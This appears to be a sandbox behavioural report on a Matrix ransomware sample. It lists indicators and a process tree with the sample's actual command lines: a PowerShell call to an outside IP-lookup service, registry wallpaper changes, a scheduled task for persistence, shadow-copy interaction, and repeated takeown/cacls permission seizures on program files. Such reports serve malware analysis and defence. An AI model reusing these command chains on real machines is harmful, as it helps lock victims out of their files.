File opened for modification C:\Program Files\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\EQ2PZD61\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Program Files (x86)\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2RM92H5V\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\BB4W7M7Z\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification C:\Users\Public\Libraries\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Enumerates connected drives (3 TTPs, 44 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process
File opened (read-only) \??\I: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\X: NDS5iFeg64.exe
File opened (read-only) \??\K: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\N: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\J: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\H: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\G: NDS5iFeg64.exe
File opened (read-only) \??\K: NDS5iFeg64.exe
File opened (read-only) \??\L: NDS5iFeg64.exe
File opened (read-only) \??\W: NDS5iFeg64.exe
File opened (read-only) \??\Z: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\Z: NDS5iFeg64.exe
File opened (read-only) \??\U: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\E: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\B: NDS5iFeg64.exe
File opened (read-only) \??\E: NDS5iFeg64.exe
File opened (read-only) \??\J: NDS5iFeg64.exe
File opened (read-only) \??\T: NDS5iFeg64.exe
File opened (read-only) \??\Y: NDS5iFeg64.exe
File opened (read-only) \??\W: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\T: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\R: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\P: NDS5iFeg64.exe
File opened (read-only) \??\R: NDS5iFeg64.exe
File opened (read-only) \??\X: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\P: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\O: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\G: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\A: NDS5iFeg64.exe
File opened (read-only) \??\I: NDS5iFeg64.exe
File opened (read-only) \??\O: NDS5iFeg64.exe
File opened (read-only) \??\U: NDS5iFeg64.exe
File opened (read-only) \??\V: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\H: NDS5iFeg64.exe
File opened (read-only) \??\M: NDS5iFeg64.exe
File opened (read-only) \??\V: NDS5iFeg64.exe
File opened (read-only) \??\S: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\Y: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\M: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\L: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only) \??\N: NDS5iFeg64.exe
File opened (read-only) \??\Q: NDS5iFeg64.exe
File opened (read-only) \??\S: NDS5iFeg64.exe
File opened (read-only) \??\Q: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow 8: myexternalip.com
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\5iAjrOSD.bmp" (process: reg.exe)
Drops file in Program Files directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
PID 2932: schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
PID 3252: vssadmin.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs
PID 2916: powershell.exe; PID 5400: NDS5iFeg64.exe (five identical entries)
Suspicious behavior: LoadsDriver 1 IoCs
PID 5400: NDS5iFeg64.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"
  - Matrix Ransomware
  - Loads dropped DLL
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID: 2168

    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWJADauI.exe"
      PID: 2100

    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWJADauI.exe (level 2)
      Command line: "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWJADauI.exe" -n
      - Executes dropped EXE
      PID: 2612

    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1T6dlbXS.txt"
      - Suspicious use of WriteProcessMemory
      PID: 2656

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
          Command line: powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2916

    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\5iAjrOSD.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
      - Suspicious use of WriteProcessMemory
      PID: 1548

        C:\Windows\SysWOW64\reg.exe (level 3)
          Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\5iAjrOSD.bmp" /f
          - Sets desktop wallpaper using registry
          PID: 1976

        C:\Windows\SysWOW64\reg.exe (level 3)
          Command line: reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          PID: 1100

        C:\Windows\SysWOW64\reg.exe (level 3)
          Command line: reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
          PID: 2520

    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\mM4C0Yfc.vbs"
      - Suspicious use of WriteProcessMemory
      PID: 2680

        C:\Windows\SysWOW64\wscript.exe (level 3)
          Command line: wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\mM4C0Yfc.vbs"
          - Suspicious use of WriteProcessMemory
          PID: 1056

            C:\Windows\SysWOW64\cmd.exe (level 4)
              Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\OfP7QNh1.bat" /sc minute /mo 5 /RL HIGHEST /F
              - Suspicious use of WriteProcessMemory
              PID: 2136

                C:\Windows\SysWOW64\schtasks.exe (level 5)
                  Command line: schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\OfP7QNh1.bat" /sc minute /mo 5 /RL HIGHEST /F
                  - Creates scheduled task(s)
                  PID: 2932

            C:\Windows\SysWOW64\cmd.exe (level 4)
              Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
              PID: 3940

                C:\Windows\SysWOW64\schtasks.exe (level 5)
                  Command line: schtasks /Run /I /tn DSHCA
                  PID: 4712
    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""
      - Suspicious use of WriteProcessMemory
      PID: 1324

        C:\Windows\SysWOW64\cacls.exe (level 3)
          Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
          PID: 320

        C:\Windows\SysWOW64\takeown.exe (level 3)
          Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
          PID: 1564

        C:\Windows\SysWOW64\cmd.exe (level 3)
          Command line: C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "AdobeID.pdf" -nobanner
          - Loads dropped DLL
          PID: 1172

            C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 4)
              Command line: NDS5iFeg.exe -accepteula "AdobeID.pdf" -nobanner
              - Executes dropped EXE
              - Loads dropped DLL
              PID: 1540

                C:\Users\Admin\AppData\Local\Temp\NDS5iFeg64.exe (level 5)
                  Command line: NDS5iFeg.exe -accepteula "AdobeID.pdf" -nobanner
                  - Drops file in Drivers directory
                  - Sets service image path in registry
                  - Executes dropped EXE
                  - Enumerates connected drives
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious behavior: LoadsDriver
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 5400

    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
      - Loads dropped DLL
      PID: 5212

        C:\Windows\SysWOW64\cacls.exe (level 3)
          Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
          PID: 5492

        C:\Windows\SysWOW64\takeown.exe (level 3)
          Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
          PID: 5516

        C:\Windows\SysWOW64\cmd.exe (level 3)
          Command line: C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DefaultID.pdf" -nobanner
          - Loads dropped DLL
          PID: 5540

            C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 4)
              Command line: NDS5iFeg.exe -accepteula "DefaultID.pdf" -nobanner
              - Executes dropped EXE
              PID: 5544

        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 3)
          Command line: NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner
          - Executes dropped EXE
          PID: 5648
    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
      - Loads dropped DLL
      PID: 5664

        C:\Windows\SysWOW64\cacls.exe (level 3)
          Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
          PID: 5684

        C:\Windows\SysWOW64\takeown.exe (level 3)
          Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
          PID: 5560

        C:\Windows\SysWOW64\cmd.exe (level 3)
          Command line: C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
          - Loads dropped DLL
          PID: 5716

            C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 4)
              Command line: NDS5iFeg.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
              - Executes dropped EXE
              PID: 6896

        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 3)
          Command line: NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner
          - Executes dropped EXE
          PID: 5736

    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""
      - Loads dropped DLL
      PID: 5908

        C:\Windows\SysWOW64\cacls.exe (level 3)
          Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C
          PID: 5948

        C:\Windows\SysWOW64\takeown.exe (level 3)
          Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"
          PID: 6932

        C:\Windows\SysWOW64\cmd.exe (level 3)
          Command line: C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "Dynamic.pdf" -nobanner
          - Loads dropped DLL
          PID: 7100

            C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 4)
              Command line: NDS5iFeg.exe -accepteula "Dynamic.pdf" -nobanner
              - Executes dropped EXE
              PID: 5976

        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 3)
          Command line: NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner
          - Executes dropped EXE
          PID: 6004
    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
      - Loads dropped DLL
      PID: 7128

        C:\Windows\SysWOW64\cacls.exe (level 3)
          Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
          PID: 2180

        C:\Windows\SysWOW64\takeown.exe (level 3)
          Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
          PID: 6100

        C:\Windows\SysWOW64\cmd.exe (level 3)
          Command line: C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "StandardBusiness.pdf" -nobanner
          - Loads dropped DLL
          PID: 6068

            C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 4)
              Command line: NDS5iFeg.exe -accepteula "StandardBusiness.pdf" -nobanner
              - Executes dropped EXE
              PID: 6108

        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 3)
          Command line: NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner
          - Executes dropped EXE
          PID: 6136

    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
      - Loads dropped DLL
      PID: 2660

        C:\Windows\SysWOW64\cacls.exe (level 3)
          Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
          PID: 6128

        C:\Windows\SysWOW64\takeown.exe (level 3)
          Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
          - Modifies file permissions
          PID: 6096

        C:\Windows\SysWOW64\cmd.exe (level 3)
          Command line: C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SignHere.pdf" -nobanner
          - Loads dropped DLL
          PID: 7116

            C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 4)
              Command line: NDS5iFeg.exe -accepteula "SignHere.pdf" -nobanner
              - Executes dropped EXE
              PID: 5992

        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 3)
          Command line: NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner
          - Executes dropped EXE
          PID: 7104
    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
      - Loads dropped DLL
      PID: 2464

        C:\Windows\SysWOW64\cacls.exe (level 3)
          Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
          PID: 6056

        C:\Windows\SysWOW64\takeown.exe (level 3)
          Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
          PID: 6048

        C:\Windows\SysWOW64\cmd.exe (level 3)
          Command line: C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ENUtxt.pdf" -nobanner
          - Loads dropped DLL
          PID: 7164

            C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 4)
              Command line: NDS5iFeg.exe -accepteula "ENUtxt.pdf" -nobanner
              - Executes dropped EXE
              PID: 2676

        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 3)
          Command line: NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner
          - Executes dropped EXE
          PID: 6176

    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""
      - Loads dropped DLL
      PID: 6252

        C:\Windows\SysWOW64\cacls.exe (level 3)
          Command line: cacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C
          PID: 6272

        C:\Windows\SysWOW64\takeown.exe (level 3)
          Command line: takeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"
          - Modifies file permissions
          PID: 6304

        C:\Windows\SysWOW64\cmd.exe (level 3)
          Command line: C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "classes.jsa" -nobanner
          - Loads dropped DLL
          PID: 6324

            C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 4)
              Command line: NDS5iFeg.exe -accepteula "classes.jsa" -nobanner
              - Executes dropped EXE
              PID: 6312

        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 3)
          Command line: NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner
          - Executes dropped EXE
          PID: 6356
    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
      - Loads dropped DLL
      PID: 6344

        C:\Windows\SysWOW64\cacls.exe (level 3)
          Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
          PID: 6460

        C:\Windows\SysWOW64\takeown.exe (level 3)
          Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
          PID: 6472

        C:\Windows\SysWOW64\cmd.exe (level 3)
          Command line: C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "adobepdf.xdc" -nobanner
          - Loads dropped DLL
          PID: 6476

            C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 4)
              Command line: NDS5iFeg.exe -accepteula "adobepdf.xdc" -nobanner
              - Executes dropped EXE
              PID: 6484

        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 3)
          Command line: NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner
          - Executes dropped EXE
          PID: 6572

    C:\Windows\SysWOW64\cmd.exe (level 2)
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
      - Loads dropped DLL
      PID: 6540

        C:\Windows\SysWOW64\cacls.exe (level 3)
          Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
          PID: 6584

        C:\Windows\SysWOW64\takeown.exe (level 3)
          Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
          - Modifies file permissions
          PID: 6596

        C:\Windows\SysWOW64\cmd.exe (level 3)
          Command line: C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "distribute_form.gif" -nobanner
          - Loads dropped DLL
          PID: 6652

            C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 4)
              Command line: NDS5iFeg.exe -accepteula "distribute_form.gif" -nobanner
              - Executes dropped EXE
              PID: 6644

        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe (level 3)
          Command line: NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner
          - Executes dropped EXE
          PID: 2268
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵
- Loads dropped DLL
PID:6604 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:6712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:2012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "main.css" -nobanner3⤵
- Loads dropped DLL
PID:6728 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "main.css" -nobanner4⤵
- Executes dropped EXE
PID:6740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵
- Loads dropped DLL
PID:6800 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:6620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵
- Modifies file permissions
PID:6828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "review_shared.gif" -nobanner3⤵
- Loads dropped DLL
PID:6836 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "review_shared.gif" -nobanner4⤵
- Executes dropped EXE
PID:6812
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵
- Loads dropped DLL
PID:2096 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:2388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵
- Loads dropped DLL
PID:784 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵
- Executes dropped EXE
PID:1820
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵
- Loads dropped DLL
PID:1876 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:2380
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:2632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵
- Loads dropped DLL
PID:1612 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵
- Executes dropped EXE
PID:808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1888
-
-
-
